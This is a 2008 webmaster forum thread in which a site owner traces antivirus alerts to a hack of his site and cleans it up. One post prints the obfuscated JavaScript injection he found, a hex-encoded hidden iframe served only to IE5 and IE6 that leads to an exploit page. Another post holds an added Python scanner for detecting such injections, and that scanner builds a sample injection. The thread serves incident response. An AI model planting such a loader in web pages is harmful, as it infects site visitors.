#1
Lonewolf Internet Sales
Virus Alert?
I've gotten a couple of reports from other webmasters that their AV software is tripping when they load the submit page on Well Heeled Women. http://www.well-heeled-women.com/cgi-bin/tgp/submit.cgi
Others have reported no alerts, and I can find nothing in the code that's not supposed to be there. Is this page setting off alarms for anyone else? Even if it's a false positive I'd like to determine the cause so I can eliminate the issue. If you do get an alert, please post what OS, AV and browser you are using. Thanks.
Last edited by Toby; 2008-03-26 at 02:56 PM.
#2
There are no stupid questions, just stupid people!
Loaded your page with no problem.
#3
Selling porn allows me to stay in a constant state of Bliss - ain't that a trip!
Join Date: Apr 2003
Posts: 3,914
I got no alert.
#4
Certified Nice Person
It was fine here, Toby. XP Media, AVG, FF and IE.
#5
Lonewolf Internet Sales
The two reports I've received so far have both been from webmasters in Europe. Still waiting to hear back what OS, AV and browser combos they were using.
#6
Where there's a will, I want to be in it.
No problems here.
__________________
Submit your free sites to Free Sex Pics
#7
You can now put whatever you want in this space :)
No problem loading the page here.
#8
ICQ:147*079*406
No problems here, Toby. XP SP2, IE 7, EZ Armor and CounterSpy.
__________________
The Sexy Side of Porn
#9
"Young dumb and full of cum"
When I went to the site, my virus warning came up. I took a picture of my laptop. I took it quick, sorry about the poor quality. If this helps, I entered your site through the recip on your submit page. Then it took me to your warning page. When I entered the site I got the virus pop-up. Hope everything is ok.
__________________
JAPANESE ADULT AFFILIATE PROGRAM
#10
Lonewolf Internet Sales
Quote:
What OS, AV and browser? And did the alert give any indication of what it had detected?
#11
Lonewolf Internet Sales
** UPDATE **
I found the problem, in the process of cleaning files now. Not sure yet how they got access. Here's the code that was inserted. I'm not sure what it does.
Code:
<script>
var s='3C696672616D65207372633D22687474703A2F2F7777772E6272656173746F6273657373696F6E2E636F6D2F73742F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E';
var o='';
for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);}
var v=navigator.appVersion;
if (v.indexOf('MSIE 6.0') != -1){document.write(unescape(o));}
if (v.indexOf('MSIE 5.') != -1){document.write(unescape(o));}
</script>
#12
Lonewolf Internet Sales
More info:
It inserts an IFRAME that links to a page with a pretty nasty ActiveX exploit. The code was added to any of my TGP-script-generated pages across four different domains; a different TGP script on a fifth domain on the same box was unaffected. It seems that a hole in my trade script was the initial access point. They were literally minutes ahead of me updating the trade script to a more secure version. Give me about 20 minutes in a locked room with the asshat(s) responsible.
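As an added example (not code from this thread or from any poster's site), here is a small Python scanner a webmaster could run over a document root to find injections of the shape quoted in post #11: it looks for script blocks that turn a quoted hex string into markup through unescape() and document.write(), decodes the string the same way the injected loop does (each pair of hex digits becomes one character), flags the result when it is an invisible iframe, and lists the browser strings the script checks for, which answers the "does it only target IE5 and 6?" question by reading the code rather than guessing. The sample injection embedded in it is constructed with a placeholder domain (malware.example.invalid); the real hex string from post #11 decodes with the same decode_hex_payload function.

```python
"""Find and decode hex-string obfuscated <script> injections in web files."""
import re
import sys
from pathlib import Path

# Constructed sample in the same shape as the injection quoted in post #11.
# The iframe target is a placeholder domain, not the one from the thread.
HIDDEN_IFRAME = ('<iframe src="http://malware.example.invalid/static.php" '
                 'width=2 height=2 style="display:none"></iframe>')
SAMPLE_INJECTION = (
    "<script> var s='" + HIDDEN_IFRAME.encode("latin-1").hex().upper() + "'; "
    "var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); "
    "o=o+c+s.substr(i,2);} var v=navigator.appVersion; "
    "if (v.indexOf('MSIE 6.0') != -1){document.write(unescape(o));}"
    "if (v.indexOf('MSIE 5.') != -1){document.write(unescape(o));}</script>"
)

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# A quoted run of hex digit pairs long enough to hide markup (>= 10 bytes).
HEX_STRING_RE = re.compile(r"['\"]((?:[0-9A-Fa-f]{2}){10,})['\"]")
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
# The navigator.appVersion checks tell you which browsers the script singles out.
UA_CHECK_RE = re.compile(r"indexOf\(\s*['\"]([^'\"]+)['\"]\s*\)")


def decode_hex_payload(hex_str):
    """Reproduce what the injected loop plus unescape() yields: '%3C%69...'
    unescapes to the character for each hex pair."""
    return bytes.fromhex(hex_str).decode("latin-1")


def is_hidden_iframe(markup):
    """True if the markup contains an iframe styled or sized to be invisible."""
    for attrs in IFRAME_RE.findall(markup):
        low = attrs.lower()
        if "display:none" in low.replace(" ", ""):
            return True
        sizes = re.findall(r"(?:width|height)\s*=\s*['\"]?(\d+)", low)
        if sizes and all(int(s) <= 2 for s in sizes):
            return True
    return False


def scan_html(text):
    """Return one finding per hex string in a script block that decodes
    something and writes it into the page."""
    findings = []
    for body in SCRIPT_RE.findall(text):
        if "unescape" not in body or "document.write" not in body:
            continue
        for hex_str in HEX_STRING_RE.findall(body):
            decoded = decode_hex_payload(hex_str)
            findings.append({
                "decoded": decoded,
                "hidden_iframe": is_hidden_iframe(decoded),
                "targets": UA_CHECK_RE.findall(body),
            })
    return findings


def scan_tree(root, suffixes=(".html", ".htm", ".shtml", ".php")):
    """Walk a document root and map each affected file to its findings."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_html(path.read_text(encoding="latin-1", errors="replace"))
            if found:
                hits[str(path)] = found
    return hits


if __name__ == "__main__":
    # Usage: python scan_injections.py /path/to/docroot
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, found in scan_tree(root).items():
        for f in found:
            flag = "HIDDEN IFRAME" if f["hidden_iframe"] else "decoded script"
            print(f"{path}: {flag}, targets {f['targets']}: {f['decoded']}")
```

Run it against a copy of the web root after restoring from a known-good backup as well as against the live tree; a file that still produces a finding after cleanup is one the manual pass missed. The browser-string list is also worth keeping in the incident notes: a later variant that adds other browsers will show up as a change in that list even if the decoded iframe looks the same.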
#13
"Young dumb and full of cum"
Shoot, I'm late getting back to this thread. Glad everything is ok. Sorry about the delay in getting the info.
__________________
JAPANESE ADULT AFFILIATE PROGRAM
#14
Along for the ride and loving it.
Join Date: Aug 2005
Location: Canada
Posts: 1,873
Hi Toby. Are you certain you got it all? I just took a quick look at the code you posted and it only seems to target IE5 & 6.
That still leaves IE7, Netscape, Opera, etc. It seems strange that someone would hack you for that and not include more code to cover all the other browser types as well. Just a thought, and I hope I'm wrong.
#15
Lonewolf Internet Sales
I noticed that in the code too. I think it specifically attacked IE5 and IE6 browsers because they're the ones susceptible to the ActiveX exploit on the redirect URL. That also makes it less likely to be detected right away by the webmaster, since most of us keep our own stuff updated.
I've been through all my sites file by file and am pretty sure I've got it all. I'd already updated the trade script that had the security hole that allowed them access. I was literally minutes late getting the update installed (released that same afternoon). Time stamp on the uploaded files for the update was 9:02 PM. Time stamp on the modified hack files was 8:50 PM.
#16
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
That virus is added through an FTP account. What makes this one bad is that they have access to the site, go in and modify precisely the few files needed with no errors or password violations, and, after you change it, in a few days they go back.
Change your password, and make sure that every time you give your password to a vendor you change it afterwards. Or, change it before giving it to a vendor and change it back. Of the exploits we see, about 80% are through poorly coded PHP, 15% are through spyware/keyloggers/passwords that are given out to someone who has spyware/a keylogger. And every 14-18 months, a certain credit card processor that stores passwords in the clear for all of the FTP accounts that they maintain for clients that run a membership site has all of their passwords stolen.
__________________
SnapReplay.com a different way to share photos - iPhone & Android